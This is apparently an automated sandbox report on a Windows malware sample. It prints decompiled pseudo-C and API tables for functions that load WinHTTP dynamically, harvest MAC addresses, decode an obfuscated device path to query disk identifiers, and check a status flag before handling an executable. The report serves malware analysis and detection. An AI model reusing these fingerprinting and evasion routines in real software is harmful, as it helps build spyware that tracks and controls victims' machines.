                                                                0x010a753e
                                                                0x010a7546
                                                                0x010a7558
                                                                0x010a755f
                                                                0x010a7566
                                                                0x010a7568
                                                                0x010a7569
                                                                0x010a7577
                                                                0x010a757f
                                                                0x010a757f
                                                                0x010a758d
                                                                0x010a7599
                                                                0x010a75a1
                                                                0x010a75a8
                                                                0x010a75af
                                                                0x010a75b1
                                                                0x010a75b8
                                                                0x010a75bf
                                                                0x010a75c6
                                                                0x010a75cd
                                                                0x010a75d4
                                                                0x010a75d8
                                                                0x010a75d8
                                                                0x010a75de
                                                                0x010a75e3
                                                                0x010a75e4
                                                                0x010a75eb
                                                                0x010a75ee
                                                                0x010a75ff
                                                                0x010a7611
                                                                0x010a7618
                                                                0x010a761f
                                                                0x010a7621
                                                                0x010a7622
                                                                0x010a7630
                                                                0x010a7638
                                                                0x010a7638
                                                                0x010a7643
                                                                0x010a7648
                                                                0x010a764d
                                                                0x010a7657
                                                                0x010a7663
                                                                0x010a7666
                                                                0x010a7669
                                                                0x010a766c
                                                                0x010a766c
                                                                0x010a766e
                                                                0x010a766f
                                                                0x010a766f
                                                                0x010a7673
                                                                0x010a7673
                                                                0x010a7676
                                                                0x010a7678
                                                                0x010a7679
                                                                0x010a767a
                                                                0x010a767d
                                                                0x010a767f
                                                                0x010a7659
                                                                0x010a765b
                                                                0x010a765c
                                                                0x010a765d
                                                                0x010a765e
                                                                0x010a765f
                                                                0x010a7660
                                                                0x010a7660
                                                                0x010a768b
                                                                0x010a768d
                                                                0x010a7691
                                                                0x010a76a5
                                                                0x010a76a7
                                                                0x010a76ab
                                                                0x010a76b1
                                                                0x010a76b1
                                                                0x010a76c5
                                                                0x010a76c7
                                                                0x010a76cb
                                                                0x00000000
                                                                0x00000000
                                                                0x010a76d1
                                                                0x010a76d4
                                                                0x010a76d6
                                                                0x010a76dd
                                                                0x010a76de
                                                                0x010a76e3
                                                                0x010a76e9
                                                                0x010a76f7
                                                                0x010a76fc
                                                                0x010a7702
                                                                0x010a7703
                                                                0x010a7706
                                                                0x010a7709
                                                                0x010a771b
                                                                0x010a771d
                                                                0x010a7720
                                                                0x010a7722
                                                                0x010a7726
                                                                0x010a772d
                                                                0x010a7734
                                                                0x010a7737
                                                                0x010a7737
                                                                0x010a7739
                                                                0x010a773a
                                                                0x010a7746
                                                                0x010a774b
                                                                0x010a7762
                                                                0x010a776d
                                                                0x010a7775
                                                                0x010a7775
                                                                0x010a777e
                                                                0x00000000
                                                                0x00000000
                                                                0x010a777e
                                                                0x010a76e9
                                                                0x00000000
                                                                0x010a76d6
                                                                0x010a76b1
                                                                0x010a76ab
                                                                0x010a778a
                                                                0x010a778a
                                                                0x010a7798
                                                                0x010a7798
                                                                0x010a779a
                                                                0x010a77a8
                                                                0x010a77a8
                                                                0x010a77b6
                                                                0x010a77b8
                                                                0x010a77b8
                                                                0x010a77c0
                                                                0x010a77c8
                                                                0x010a77d4

                                                                APIs
                                                                • LoadLibraryA.KERNELBASE(Winhttp.dll,WinHttpOpen,?,00000000,00000000,00000000,00000000,00000000,E231E201,E231E1FF,00000000,.,.,.,010CAB20,?), ref: 010A73B3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A73BC
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpSetTimeouts,00000000,000007D0,000007D0,00001388,00001388), ref: 010A73E0
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A73E3
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpConnect,?,?,?,00000000), ref: 010A73F8
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A73FB
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpOpenRequest,?,E20EE210,?,00000000,00000000,00000000,00000000), ref: 010A7500
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A7503
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpAddRequestHeaders,?,?,000000FF,01093978), ref: 010A7572
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A7575
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpAddRequestHeaders,?,?,000000FF,?,?), ref: 010A762B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A762E
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpSendRequest,?,00000000,000000FF,00000000,?,?,00000000,?), ref: 010A7688
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A768B
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpReceiveResponse,?,00000000), ref: 010A76A2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A76A5
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpQueryDataAvailable,?,00000000), ref: 010A76C2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A76C5
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpReadData,?,?,00000000,?), ref: 010A7712
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A7715
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpCloseHandle,?), ref: 010A7793
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A7796
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpCloseHandle,?,?), ref: 010A77A3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A77A6
                                                                • LoadLibraryA.KERNEL32(Winhttp.dll,WinHttpCloseHandle,?), ref: 010A77B3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010A77B6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: 6$B$.$!+$#%$% $'!$'h$()$,7$2/$2j$4>$56$8*$:.$<0$>d$AI$AI$CY$F$$LC$PS$VX$WinHttpAddRequestHeaders$WinHttpCloseHandle$WinHttpConnect$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$WinHttpSetTimeouts$Winhttp.dll$YX$Z($\@$^A$cg$g}$hv$hv$ii$kt$kt$r{$tk$vm$ya$y~$z7$zk$}g
                                                                • API String ID: 2574300362-3482149607
                                                                • Opcode ID: c0ce472ba6c2fe1822619ed1725b58c1e9ae70ea3ae61827acc8ef0f10754a54
                                                                • Instruction ID: 2e13ee9ce326a03f2c31aaf3602942a25128d56d407831aaea45d99523e13a0e
                                                                • Opcode Fuzzy Hash: c0ce472ba6c2fe1822619ed1725b58c1e9ae70ea3ae61827acc8ef0f10754a54
                                                                • Instruction Fuzzy Hash: 4A1269B8D00219AADF25DFE4CD94BEEBB74FF44300F4081D9E559AA240DB399A81CF52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010AE466, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 192libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 54%
                                                                			E010AE466(intOrPtr __ecx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v56;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t48;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				void* _t54;
				_Unknown_base(*)()* _t57;
				void* _t58;
				intOrPtr _t63;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t93;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t108;
				void* _t124;
				signed int _t126;
				intOrPtr* _t128;
				char _t129;
				intOrPtr* _t130;
				void* _t131;

				_t95 = __ecx;
				_push(0x12);
				_v8 = __ecx;
				_v12 = 0x288;
				_t48 = E010282C5();
				_t125 = _t48;
				_push(0x288);
				_v20 = _t48;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_t128 = E010282C5();
				_v16 = _t128;
				if(_t128 != 0) {
					_t52 = LoadLibraryA("Iphlpapi.dll"); // executed
					_t53 = GetProcAddress(_t52, "GetAdaptersInfo"); // executed
					_t54 =  *_t53(_t128,  &_v12); // executed
					if(_t54 != 0x6f) {
						L13:
						_t57 = GetProcAddress(LoadLibraryA("Iphlpapi.dll"), "GetAdaptersInfo"); // executed
						_t58 =  *_t57(_t128,  &_v12); // executed
						_t126 = 0x18;
						if(_t58 == 0) {
							_t97 = _t128;
							_t130 = _v20;
							do {
								_push( *(_t97 + 0x199) & 0x000000ff);
								_push( *(_t97 + 0x198) & 0x000000ff);
								_push( *(_t97 + 0x197) & 0x000000ff);
								_push( *(_t97 + 0x196) & 0x000000ff);
								_push( *(_t97 + 0x195) & 0x000000ff);
								E010979DE(_t130, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t97 + 0x194) & 0x000000ff);
								_t108 = _t130;
								_v36 = 0xf;
								_t131 = _t131 + 0x20;
								_v56 = 0;
								_v40 = _v40 & 0x00000000;
								_t29 = _t108 + 1; // 0x10ae84e
								_t124 = _t29;
								do {
									_t77 =  *_t108;
									_t108 = _t108 + 1;
								} while (_t77 != 0);
								E01094686( &_v56, _t130, _t108 - _t124);
								_t79 = _v28;
								_push( &_v56);
								if(_v24 == _t79) {
									_push(_t79);
									E010A60F4( &_v32);
								} else {
									E010944ED(_t79);
									_v28 = _v28 + _t126;
								}
								E01094615( &_v56);
								_t97 =  *_t97;
							} while (_t97 != 0);
							_t128 = _v16;
							_t95 = _v8;
						}
						E010282A8(_t128);
						E010A5AB8(_t95,  &_v32);
						_t129 = _v32;
						if(_t129 != 0) {
							_t63 = _v28;
							if(_t129 != _t63) {
								_t96 = _t63;
								do {
									E01094615(_t129);
									_t129 = _t129 + _t126;
								} while (_t129 != _t96);
								goto L26;
							}
							goto L27;
						}
					} else {
						E010282A8(_t128);
						_push(_v12);
						_t84 = E010282C5();
						_t128 = _t84;
						_v16 = _t84;
						if(_t128 != 0) {
							goto L13;
						} else {
							E010282A8(_t125);
							E010A5AB8(_t95,  &_v32);
							_t129 = _v32;
							if(_t129 != 0) {
								_t88 = _v28;
								_t126 = 0x18;
								if(_t129 != _t88) {
									_t98 = _t88;
									do {
										E01094615(_t129);
										_t129 = _t129 + _t126;
									} while (_t129 != _t98);
									goto L26;
								}
								goto L27;
							}
						}
					}
				} else {
					E010282A8(_t125);
					E010A5AB8(_t95,  &_v32);
					_t129 = _v32;
					if(_t129 != 0) {
						_t93 = _v28;
						_t126 = 0x18;
						if(_t129 != _t93) {
							_t99 = _t93;
							do {
								E01094615(_t129);
								_t129 = _t129 + _t126;
							} while (_t129 != _t99);
							L26:
							_t129 = _v32;
							_t95 = _v8;
						}
						L27:
						asm("cdq");
						E01094A9F(_t95, _t126, _t129, (_v24 - _t129) / _t126 * 0x18);
					}
				}
				return _t95;
			}








































                                                                0x010ae46f
                                                                0x010ae476
                                                                0x010ae478
                                                                0x010ae47b
                                                                0x010ae47e
                                                                0x010ae483
                                                                0x010ae487
                                                                0x010ae488
                                                                0x010ae48b
                                                                0x010ae48e
                                                                0x010ae491
                                                                0x010ae499
                                                                0x010ae49b
                                                                0x010ae4a2
                                                                0x010ae4f2
                                                                0x010ae4f9
                                                                0x010ae4ff
                                                                0x010ae504
                                                                0x010ae55e
                                                                0x010ae574
                                                                0x010ae57a
                                                                0x010ae57e
                                                                0x010ae581
                                                                0x010ae587
                                                                0x010ae589
                                                                0x010ae58c
                                                                0x010ae593
                                                                0x010ae59b
                                                                0x010ae5a3
                                                                0x010ae5ab
                                                                0x010ae5b3
                                                                0x010ae5c2
                                                                0x010ae5c7
                                                                0x010ae5c9
                                                                0x010ae5d0
                                                                0x010ae5d3
                                                                0x010ae5d7
                                                                0x010ae5db
                                                                0x010ae5db
                                                                0x010ae5de
                                                                0x010ae5de
                                                                0x010ae5e0
                                                                0x010ae5e1
                                                                0x010ae5ec
                                                                0x010ae5f1
                                                                0x010ae5f7
                                                                0x010ae5fb
                                                                0x010ae609
                                                                0x010ae60d
                                                                0x010ae5fd
                                                                0x010ae5ff
                                                                0x010ae604
                                                                0x010ae604
                                                                0x010ae615
                                                                0x010ae61a
                                                                0x010ae61c
                                                                0x010ae624
                                                                0x010ae627
                                                                0x010ae627
                                                                0x010ae62b
                                                                0x010ae637
                                                                0x010ae63c
                                                                0x010ae641
                                                                0x010ae643
                                                                0x010ae648
                                                                0x010ae64a
                                                                0x010ae64c
                                                                0x010ae64e
                                                                0x010ae653
                                                                0x010ae655
                                                                0x00000000
                                                                0x010ae64c
                                                                0x00000000
                                                                0x010ae648
                                                                0x010ae506
                                                                0x010ae507
                                                                0x010ae50c
                                                                0x010ae50f
                                                                0x010ae514
                                                                0x010ae516
                                                                0x010ae51d
                                                                0x00000000
                                                                0x010ae51f
                                                                0x010ae520
                                                                0x010ae52c
                                                                0x010ae531
                                                                0x010ae536
                                                                0x010ae53c
                                                                0x010ae541
                                                                0x010ae544
                                                                0x010ae54a
                                                                0x010ae54c
                                                                0x010ae54e
                                                                0x010ae553
                                                                0x010ae555
                                                                0x00000000
                                                                0x010ae559
                                                                0x00000000
                                                                0x010ae544
                                                                0x010ae536
                                                                0x010ae51d
                                                                0x010ae4a4
                                                                0x010ae4a5
                                                                0x010ae4b1
                                                                0x010ae4b6
                                                                0x010ae4bb
                                                                0x010ae4c1
                                                                0x010ae4c6
                                                                0x010ae4c9
                                                                0x010ae4cf
                                                                0x010ae4d1
                                                                0x010ae4d3
                                                                0x010ae4d8
                                                                0x010ae4da
                                                                0x010ae659
                                                                0x010ae659
                                                                0x010ae65c
                                                                0x010ae65c
                                                                0x010ae65f
                                                                0x010ae664
                                                                0x010ae66c
                                                                0x010ae672
                                                                0x010ae4bb
                                                                0x010ae679

                                                                APIs
                                                                • LoadLibraryA.KERNELBASE(Iphlpapi.dll,GetAdaptersInfo,00000000,00000000,?,00000000,?), ref: 010AE4F2
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010AE4F9
                                                                • GetAdaptersInfo.IPHLPAPI(?,?,?,?,?,?,?,?,?,010AE84D,?,00000000,?), ref: 010AE4FF
                                                                • LoadLibraryA.KERNEL32(Iphlpapi.dll,GetAdaptersInfo,00000000,00000000,?,?,?,?,?,?,?,?,?,010AE84D,?,00000000), ref: 010AE56D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 010AE574
                                                                • GetAdaptersInfo.IPHLPAPI(?,?,?,?,?,?,?,?,?,010AE84D,?,00000000,?), ref: 010AE57A
                                                                  • Part of subcall function 010A60F4: __EH_prolog.LIBCMT ref: 010A60F9
                                                                • _Deallocate.LIBCONCRT ref: 010AE66C
                                                                  • Part of subcall function 010282A8: _free.LIBCMT ref: 010282BB
                                                                  • Part of subcall function 01094615: _Deallocate.LIBCONCRT ref: 01094624
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: AdaptersAddressDeallocateInfoLibraryLoadProc$H_prolog_free
                                                                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$GetAdaptersInfo$Iphlpapi.dll
                                                                • API String ID: 502533160-2818122367
                                                                • Opcode ID: 336aee18a1c28a2f0e99c8ef4379d2a7db13bec7e763b24b9ba74611ea4643ee
                                                                • Instruction ID: c582848d518db4d134f3ebfccc0972a4f3da7c506ee45013d84e13f1c382b474
                                                                • Opcode Fuzzy Hash: 336aee18a1c28a2f0e99c8ef4379d2a7db13bec7e763b24b9ba74611ea4643ee
                                                                • Instruction Fuzzy Hash: 73510C72E001265FDF51EBF8C8909FEBBF8AF19640F44006AE994F7241EA745E055BE0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010AE67A, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 147fileCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 95%
                                                                			E010AE67A(signed int* __ecx, void* __edx) {
				long _v8;
				long _v12;
				long _v16;
				void _v20;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				void _v32;
				signed int _v36;
				signed int _v40;
				char _v56;
				short _v58;
				intOrPtr _v62;
				intOrPtr _v66;
				intOrPtr _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				intOrPtr _v82;
				intOrPtr _v86;
				intOrPtr _v90;
				short _v94;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t67;
				long _t68;
				signed int _t72;
				signed int _t73;
				void* _t75;
				void* _t77;
				void* _t85;
				signed int _t87;
				intOrPtr* _t89;
				void* _t97;
				void* _t99;
				signed int* _t100;
				void* _t101;

				_t97 = __edx;
				_v94 = 0xe21de21c;
				_v90 = 0xe21fe26c;
				_t100 = __ecx;
				_v86 = 0xe22de214;
				_v82 = 0xe234e23f;
				_t87 = 0;
				_v78 = 0xe22ae221;
				_v74 = 0xe227e22b;
				_v70 = 0xe23fe208;
				_v66 = 0xe239e227;
				_v62 = 0xe261e235;
				_v58 = 0;
				do {
					_t11 = _t87 - 0x1dc0; // -7616
					 *(_t101 + _t87 * 2 - 0x5a) =  *(_t101 + _t87 * 2 - 0x5a) ^ _t11;
					_t87 = _t87 + 1;
				} while (_t87 < 0x12);
				_v58 = 0;
				_t63 = CreateFileW( &_v94, 0, 3, 0, 3, 0, 0); // executed
				_t99 = _t63;
				if(_t99 != 0xffffffff) {
					_v24 = 0;
					_v32 = 0;
					_v28 = 0;
					asm("xorps xmm0, xmm0");
					_v8 = 0;
					asm("movlpd [ebp-0x10], xmm0"); // executed
					_t67 = DeviceIoControl(_t99, 0x2d1400,  &_v32, 0xc,  &_v20, 8,  &_v8, 0); // executed
					__eflags = _t67;
					if(__eflags != 0) {
						_t68 = _v16;
						_push(_t68);
						_v12 = _t68;
						_t85 = E010218C3(_t97, __eflags);
						__eflags = _t85;
						if(_t85 == 0) {
							_t85 = 0;
							__eflags = 0;
						} else {
							E01024A10(_t99, _t85, 0, _v12);
						}
						_t72 = DeviceIoControl(_t99, 0x2d1400,  &_v32, 0xc, _t85, _v12,  &_v8, 0); // executed
						__eflags = _t72;
						if(_t72 != 0) {
							_t73 =  *(_t85 + 0x18);
							__eflags = _t73;
							if(_t73 != 0) {
								_t44 =  &_v40;
								 *_t44 = _v40 & 0x00000000;
								__eflags =  *_t44;
								_t98 = _t85 + _t73;
								_t89 = _t85 + _t73;
								_v36 = 0xf;
								_v56 = 0;
								_v12 = _t89 + 1;
								do {
									_t75 =  *_t89;
									_t89 = _t89 + 1;
									__eflags = _t75;
								} while (_t75 != 0);
								E01094686( &_v56, _t98, _t89 - _v12);
								_t77 = E010A54A5( &_v56, _t100);
								_t100[4] = _t100[4] & 0x00000000;
								_t56 =  &(_t100[5]);
								 *_t56 = _t100[5] & 0x00000000;
								__eflags =  *_t56;
								E01094728(_t100, _t77);
								E01094615( &_v56);
								goto L17;
							}
							_t100[4] = _t100[4] & _t73;
							_t100[5] = 0xf;
							 *_t100 = _t73;
							goto L17;
						} else {
							_t100[4] = _t100[4] & _t72;
							_t100[5] = 0xf;
							 *_t100 = _t72;
							__eflags = _t85;
							if(_t85 == 0) {
								L18:
								__eflags = _t99;
								if(_t99 != 0) {
									E010AE828(_t99); // executed
								}
								L20:
								return _t100;
							}
							L17:
							L010218BE(_t85);
							goto L18;
						}
					}
					_t100[4] = 0;
					_t100[5] = 0xf;
					 *_t100 = 0;
					goto L18;
				}
				_t100[4] = 0;
				_t100[5] = 0xf;
				 *_t100 = 0;
				goto L20;
			}







































                                                                0x010ae67a
                                                                0x010ae683
                                                                0x010ae68d
                                                                0x010ae694
                                                                0x010ae696
                                                                0x010ae69e
                                                                0x010ae6a5
                                                                0x010ae6a7
                                                                0x010ae6ae
                                                                0x010ae6b5
                                                                0x010ae6bc
                                                                0x010ae6c3
                                                                0x010ae6ca
                                                                0x010ae6ce
                                                                0x010ae6ce
                                                                0x010ae6d4
                                                                0x010ae6d9
                                                                0x010ae6da
                                                                0x010ae6e8
                                                                0x010ae6f1
                                                                0x010ae6f7
                                                                0x010ae6fc
                                                                0x010ae713
                                                                0x010ae71c
                                                                0x010ae725
                                                                0x010ae72e
                                                                0x010ae731
                                                                0x010ae735
                                                                0x010ae73a
                                                                0x010ae740
                                                                0x010ae742
                                                                0x010ae755
                                                                0x010ae758
                                                                0x010ae759
                                                                0x010ae761
                                                                0x010ae764
                                                                0x010ae766
                                                                0x010ae778
                                                                0x010ae778
                                                                0x010ae768
                                                                0x010ae76e
                                                                0x010ae773
                                                                0x010ae790
                                                                0x010ae796
                                                                0x010ae798
                                                                0x010ae7ac
                                                                0x010ae7af
                                                                0x010ae7b1
                                                                0x010ae7c1
                                                                0x010ae7c1
                                                                0x010ae7c1
                                                                0x010ae7c5
                                                                0x010ae7c8
                                                                0x010ae7ca
                                                                0x010ae7d1
                                                                0x010ae7d8
                                                                0x010ae7db
                                                                0x010ae7db
                                                                0x010ae7dd
                                                                0x010ae7de
                                                                0x010ae7de
                                                                0x010ae7ea
                                                                0x010ae7f2
                                                                0x010ae7f7
                                                                0x010ae7fd
                                                                0x010ae7fd
                                                                0x010ae7fd
                                                                0x010ae802
                                                                0x010ae80a
                                                                0x00000000
                                                                0x010ae80a
                                                                0x010ae7b3
                                                                0x010ae7b6
                                                                0x010ae7bd
                                                                0x00000000
                                                                0x010ae79a
                                                                0x010ae79a
                                                                0x010ae79d
                                                                0x010ae7a4
                                                                0x010ae7a6
                                                                0x010ae7a8
                                                                0x010ae816
                                                                0x010ae816
                                                                0x010ae818
                                                                0x010ae81b
                                                                0x010ae820
                                                                0x010ae822
                                                                0x010ae827
                                                                0x010ae827
                                                                0x010ae80f
                                                                0x010ae810
                                                                0x00000000
                                                                0x010ae815
                                                                0x010ae798
                                                                0x010ae744
                                                                0x010ae747
                                                                0x010ae74e
                                                                0x00000000
                                                                0x010ae74e
                                                                0x010ae6fe
                                                                0x010ae701
                                                                0x010ae708
                                                                0x00000000

                                                                APIs
                                                                • CreateFileW.KERNELBASE(E21DE21C,00000000,00000003,00000000,00000003,00000000,00000000,?,00000000,?), ref: 010AE6F1
                                                                • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,010AE858,00000008,?,00000000), ref: 010AE73A
                                                                • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,00000000,00000000,?,00000000), ref: 010AE790
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000011.00000002.744792392.0000000001021000.00000020.00020000.sdmp, Offset: 01020000, based on PE: true
                                                                • Associated: 00000011.00000002.744778722.0000000001020000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745118664.00000000010AF000.00000002.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745159076.00000000010C1000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745175580.00000000010C2000.00000008.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745203086.00000000010CB000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745218914.00000000010D5000.00000004.00020000.sdmp Download File
                                                                • Associated: 00000011.00000002.745237651.00000000010D8000.00000002.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ControlDevice$CreateFile
                                                                • String ID: !*$'9$+'$5a$?4
                                                                • API String ID: 1161430685-691340170
                                                                • Opcode ID: de8af43add4b4696411f93668c0d71af87a08f6f9fcf59cd9ddde096ab2db641
                                                                • Instruction ID: 31a3ea34ae874c4489ce73d3fc5cb2bb24c14872548f2391b6f46e6f9134a2cd
                                                                • Opcode Fuzzy Hash: de8af43add4b4696411f93668c0d71af87a08f6f9fcf59cd9ddde096ab2db641
                                                                • Instruction Fuzzy Hash: 0751C0B4900309AFEB20DFE4D980BEEBBF8FF14304F50066EE581A6241E7745A09CB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 010211D4, Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 203libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 45%
                                                                			E010211D4() {
				signed int _v5;
				signed int _v6;
				signed int _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v64;
				char _v88;
				char _v112;
				void* _t62;
				signed int* _t88;
				intOrPtr _t90;
				intOrPtr _t104;
				signed char _t121;
				void* _t131;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;

				_v12 = _v12 & 0x00000000;
				_t62 = E010AE087(0x10ccfc8, 0, _t155);
				_t123 = 0xa;
				if(_t62 < 0x12c) {
					L17:
					_v24 = 0x11223344;
					_t144 = _t143 ^ _v24;
					__eflags = _t144 - _v24;
					if(__eflags == 0) {
						L22:
						ss =  *((intOrPtr*)(_t62 - 0x716f6f70));
						if(__eflags == 0) {
							L8:
							L15:
							E010944B3(_t123);
							return _v40;
						}
						asm("invalid");
						goto L24;
					} else {
						if(__eflags != 0) {
							L24:
							_t145 = _t144 ^ _v24;
							__eflags = 1;
							if(1 == 0) {
								__eflags = 0;
								return 0;
							}
							_t146 = _t145 - 0x18;
							E01094552(_t146, 0x10c19d8);
							_t48 = 0 + "exe"; // 0x57006578
							_v16 = E01045177( *_t48 & 0x000000ff, 0);
							_v15 = E01045177( *((1 << 0) + "exe") & 0x000000ff, 1);
							_v14 = E01045177( *((1 << 1) + "exe") & 0x000000ff, 2);
							__eflags = 0;
							_v13 = 0;
							_t147 = _t146 - 0x18;
							E01094552(_t147, 0x10ccf08);
							_t148 = _t147 - 0x18;
							E0109451E(_t148, E0104509F( &_v16));
							_t88 = E010A47CC();
							_t149 = _t148 + 0x48;
							if(__eflags == 0) {
								_t131 = _t149 - 0x18;
								E01094552(_t131, 0x10c19d8); // executed
								_t90 = E010A4E2A(__eflags); // executed
								_v32 = _t90;
								if(__eflags != 0 && __eflags == 0) {
									0x77021375();
								}
								_push(0xffffffff);
								_push(_v32);
								_push("WaitForSingleObject");
							}
							if (__eflags != 0) goto L29;
							 *_t88 = _t88 +  *_t88;
							 *_t88 = _t88 +  *_t88;
							__eflags =  *_t88;
						}
						if(__eflags != 0) {
							asm("invalid");
						}
						goto L22;
					}
				}
				_v5 = 0;
				E01093211( &_v64); // executed
				_t152 = _t143 - 0x18;
				E01094552(_t152,  &_v64);
				_t153 = _t152 - 0x18;
				E01094552(_t153, 0x10cced8);
				_t154 = _t153 - 0x18;
				E01094552(_t154, 0x10ccf38); // executed
				_t104 = E01093828(); // executed
				_t143 = _t154 + 0x48;
				_v36 = _t104;
				_v20 = _v36;
				if(_v20 == 0) {
					L13:
					__eflags = _v5 & 0x000000ff;
					if((_v5 & 0x000000ff) != 0) {
						_t123 =  &_v64;
						_t62 = E010944B3( &_v64);
						goto L17;
					}
					_t38 =  &_v40;
					 *_t38 = _v40 & 0x00000000;
					__eflags =  *_t38;
					_t123 =  &_v64;
					goto L15;
				}
				E0109451E( &_v112, "status");
				_v12 = _v12 | 0x00000001;
				if((E010948B9(_v20,  &_v112) & 0x000000ff) == 0) {
					L5:
					_t23 =  &_v28;
					 *_t23 = _v28 & 0x00000000;
					__eflags =  *_t23;
					L6:
					_v6 = _v28;
					if((_v12 & 0x00000002) == 0) {
						__eflags = _v12 & 0x00000001;
						if((_v12 & 0x00000001) != 0) {
							_t32 =  &_v12;
							 *_t32 = _v12 & 0xfffffffe;
							__eflags =  *_t32;
							E010944B3( &_v112);
						}
						__eflags = _v6 & 0x000000ff;
						if((_v6 & 0x000000ff) != 0) {
							_v5 = 1;
						}
						goto L13;
					}
					_v12 = _v12 & 0xfffffffd;
					_t123 =  &_v88;
					E010944B3( &_v88);
					goto L8;
				}
				E0109451E( &_v88, "status");
				_v12 = _v12 | 0x00000002;
				_t121 = E010A0CF8( &_v88);
				asm("movsd xmm0, [0x10bccf0]");
				asm("ucomisd xmm0, [eax]");
				asm("lahf");
				if((_t121 & 0x00000044) != 0) {
					goto L5;
				}
				_v28 = 1;
				goto L6;
			}




































                                                                0x010211dd
                                                                0x010211ea
                                                                0x010211ef
                                                                0x010211f5
                                                                0x0102130c
